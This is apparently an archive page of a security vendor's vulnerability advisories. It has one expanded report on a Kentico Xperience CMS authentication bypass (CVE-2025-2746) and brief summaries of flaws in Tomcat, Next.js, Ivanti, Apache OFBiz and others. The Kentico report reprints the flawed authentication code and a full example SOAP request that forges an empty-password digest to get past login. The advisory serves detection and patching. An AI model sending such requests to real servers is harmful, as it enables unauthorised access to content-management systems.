Vulnerability Report Archives | Page 2 of 6 | SECaaS Platform AIONCLOUD

[2025.06 Vulnerability Report] Kentico Xperience CMS Authentication Bypass

2025.06 – Kentico Xperience CMS Authentication Bypass

The vulnerability is an authentication bypass in the Kentico Xperience CMS platform that could allow an attacker to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx. The vulnerability was patched in Kentico Xperience CMS version 13.0.178, and AIWAF responded by adding detection patterns for it in the May 2025 pattern update.

1. Overview

Xperience CMS is a digital marketing platform provided by Kentico: an integrated platform that includes content management, digital marketing, e-commerce management, and more. This report summarizes our analysis of CVE-2025-2746 and CVE-2025-2747, the authentication bypass and RCE vulnerabilities recently discovered in the platform.

Source: https://en.wikipedia.org/wiki/Kentico_Xperience

2. Attack type

CVE-2025-2746 is an authentication bypass vulnerability in the authentication logic of certain endpoints of Kentico's Xperience CMS platform. According to watchTowr, who analyzed the vulnerability, an attacker can bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx, because the authentication routine returns an empty string as the password hash when an invalid username is supplied.

    // Vulnerable routine as analyzed by watchTowr: for an unknown username the
    // method returns "" instead of failing, so the digest check proceeds against
    // an empty password.
    protected override string AuthenticateToken(UsernameToken token)
    {
        if (token == null)
        {
            throw new ArgumentNullException("[WebServiceAuthorization.AuthenticateToken]: Missing username authentication token.");
        }
        AbstractStockHelper<RequestStockHelper>.Add("AUTH_PROCESSED", true, false);
        string value = SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + ".CMSStagingServiceUsername");
        string text = EncryptionHelper.DecryptData(SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + ".CMSStagingServicePassword"));
        if (string.IsNullOrEmpty(text))
        {
            throw new SecurityException("[WebServiceAuthorization.AuthenticateToken]: Staging does not work with blank password. Set a password on the target server.");
        }
        if (value == token.Username)
        {
            // Known username: return the SHA1 hash of the configured staging password.
            return StagingTaskRunner.GetSHA1Hash(text);
        }
        // Unknown username: an empty string is returned rather than an error.
        return "";
    }

Source: https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/

An attacker can bypass the authentication process by selecting the hash-based (PasswordDigest) password verification mode and sending a SOAP request whose digest is computed over an empty-string password, the value the routine returns for an unknown username. In conjunction with the second vulnerability, the attacker can then use the internal API reachable after authentication to attempt an RCE attack.

Example attack request:

    POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
    Host: www.test.com
    Content-Type: text/xml; charset=utf-8
    Content-Length: 1095
    SOAPAction: "http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData"

    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Header>
        <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
          <wsse:UsernameToken>
            <wsse:Username>hacker</wsse:Username>
            <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OZ/c8o7h3mtigow7HXu0f+BUgLk=</wsse:Password>
            <wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce>
            <wsu:Created>2025-05-013T014:54:17Z</wsu:Created>
          </wsse:UsernameToken>
        </wsse:Security>
      </soap:Header>
      <soap:Body>
        <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
          <stagingTaskData><![CDATA[<hacker>]]></stagingTaskData>
    […]

[2025.05 Vulnerability Report] Kubernetes Ingress NGINX Controller Remote Code Execution

This is an RCE vulnerability in the Ingress NGINX controller that could allow an attacker to execute malicious commands by sending an AdmissionReview request containing a crafted temporary NGINX configuration template. The vulnerability was patched in Ingress NGINX Controller versions 1.12.1, 1.11.5, and […]

[2025.04 Vulnerability Report] FOXCMS Qianhu Remote Code Execution (CVE-2025-29306)

CVE-2025-29306 is a vulnerability that poses a serious security threat to organizations using FoxCMS. An attacker who exploits it can gain complete control of the system, which can result in data leakage, service interruption, and more. Prompt patching and security hardening measures are therefore required for […]

[2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813)

Apache Tomcat is a Java-based web application server widely used worldwide, and a serious path equivalence vulnerability, CVE-2025-24813, was recently discovered in it. This vulnerability poses the risk that an attacker can access restricted resources or execute arbitrary code without authentication, due to a path validation error in […]

[2025.04 Vulnerability Report] Next.js Middleware Authentication Bypass

The vulnerability is an authentication bypass in Next.js that allows an attacker to bypass API access control by sending a request with the middleware path placed in the x-middleware-request header, or by entering it so as to satisfy the recursion condition. The vulnerabilities were patched in Next.js versions […]

[2025.03 Vulnerability Report] HUNK COMPANION Plugin Remote Code Execution (CVE-2024-9707)

This major vulnerability in the Hunk Companion plugin could be the first step in a broader exploit chain: if another plugin with a known vulnerability is activated through it, an attacker could achieve remote code execution on the WordPress site. The widespread distribution of […]

[2025.03 Vulnerability Report] Ivanti vTM Authentication Bypass

The vulnerability is an authentication bypass in Ivanti vTM that allows an attacker to create an arbitrary administrator account by bypassing access control on the loadable wizard.cgi for all sections of the web interface. The vulnerability has been patched in Ivanti vTM versions 22.2R1, 22.7R2, and others, and AIWAF responds […]

[2025.02 Vulnerability Report] Delta Electronics DIAEnergie SQL Injection (CVE-2024-4547)

CVE-2024-4547 is a SQL injection vulnerability affecting Delta Electronics DIAEnergie v1.10.1.8610 and earlier. The issue lies in the CEBC.exe component, which processes the 'RecalculateScript' message; this message contains four fields separated by the '~' character. An unauthenticated remote attacker could exploit the vulnerability by manipulating the fourth field to inject malicious SQL statements, which could lead […]

[2025.02 Vulnerability Report] Apache OFBiz Pre-Auth Remote Code Execution

The vulnerability is a pre-authentication RCE vulnerability in Apache OFBiz that allows an attacker to execute malicious code without authenticating, by exploiting an incorrect authentication check applied when a request for a particular URL is processed. The vulnerability was patched in version 18.12.15 of Apache OFBiz, and AIWAF responds through the 2228: Apache OFBiz Remote […]

[2025.01 Vulnerability Report] Ivanti Connect Secure & Policy Secure, ZTA Gateways Vulnerability

The vulnerability is a pre-authentication RCE vulnerability in Ivanti's Connect Secure, Policy Secure, and ZTA Gateway products, which exploits a buffer overflow during IF-T/TLS protocol communication. The vulnerability is patched in 22.7R2.5 for Ivanti Connect Secure and Ivanti ZTA Gateway products, and AIWAF is continuously monitoring related vulnerabilities.

1. Overview

Ivanti's Connect Secure, Policy […]
